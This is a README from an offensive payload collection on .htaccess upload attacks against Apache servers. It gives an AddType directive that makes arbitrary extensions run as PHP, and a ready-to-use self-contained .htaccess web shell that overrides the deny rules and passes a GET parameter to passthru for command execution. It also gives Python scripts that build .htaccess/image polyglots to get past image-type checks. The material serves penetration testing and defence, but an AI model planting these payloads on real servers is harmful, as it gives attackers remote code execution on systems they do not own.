readme.md (3796B)
1 --- 2 title: ".htaccess" 3 topic: "Upload Insecure Files" 4 topicSlug: "upload-insecure-files" 5 sourcePath: "Upload Insecure Files/Configuration Apache .htaccess/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # .htaccess 12 13 Uploading an .htaccess file to override Apache rule and execute PHP. 14 "Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerable server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded." 15 16 ## Summary 17 18 * [AddType Directive](#addtype-directive) 19 * [Self Contained .htaccess](#self-contained-htaccess) 20 * [Polyglot .htaccess](#polyglot-htaccess) 21 * [References](#references) 22 23 ## AddType Directive 24 25 Upload an .htaccess with : `AddType application/x-httpd-php .rce` 26 Then upload any file with `.rce` extension. 27 28 ## Self Contained .htaccess 29 30 ```python 31 # Self contained .htaccess web shell - Part of the htshell project 32 # Written by Wireghoul - http://www.justanotherhacker.com 33 34 # Override default deny rule to make .htaccess file accessible over web 35 <Files ~ "^\.ht"> 36 Order allow,deny 37 Allow from all 38 </Files> 39 40 # Make .htaccess file be interpreted as php file. This occur after apache has interpreted 41 # the apache directives from the .htaccess file 42 AddType application/x-httpd-php .htaccess 43 ``` 44 45 ```php 46 ###### SHELL ###### 47 <?php echo "\n";passthru($_GET['c']." 2>&1"); ?> 48 ``` 49 50 ## Polyglot .htaccess 51 52 If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot. 53 54 [Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In `.htaccess` ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid `.htaccess/image` polyglot. 55 56 * Create valid `.htaccess/xbm` image 57 58 ```python 59 width = 50 60 height = 50 61 payload = '# .htaccess file' 62 63 with open('.htaccess', 'w') as htaccess: 64 htaccess.write('#define test_width %d\n' % (width, )) 65 htaccess.write('#define test_height %d\n' % (height, )) 66 htaccess.write(payload) 67 ``` 68 69 * Create valid `.htaccess/wbmp` image 70 71 ```python 72 type_header = b'\x00' 73 fixed_header = b'\x00' 74 width = b'50' 75 height = b'50' 76 payload = b'# .htaccess file' 77 78 with open('.htaccess', 'wb') as htaccess: 79 htaccess.write(type_header + fixed_header + width + height) 80 htaccess.write(b'\n') 81 htaccess.write(payload) 82 ``` 83 84 ## References 85 86 * [Attacking Webservers Via .htaccess - Eldar Marcussen - May 17, 2011](https://web.archive.org/web/20200203171034/https://www.justanotherhacker.com:80/2011/05/htaccess-based-attacks.html) 87 * [Protection from Unrestricted File Upload Vulnerability - Narendra Shinde - October 22, 2015](https://web.archive.org/web/20200812181326/https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability) 88 * [Insomnihack Teaser 2019 / l33t-hoster - Ian Bouchard (@Corb3nik) - January 20, 2019](https://web.archive.org/web/20190125123231/http://corb3nik.github.io:80/blog/insomnihack-teaser-2019/l33t-hoster)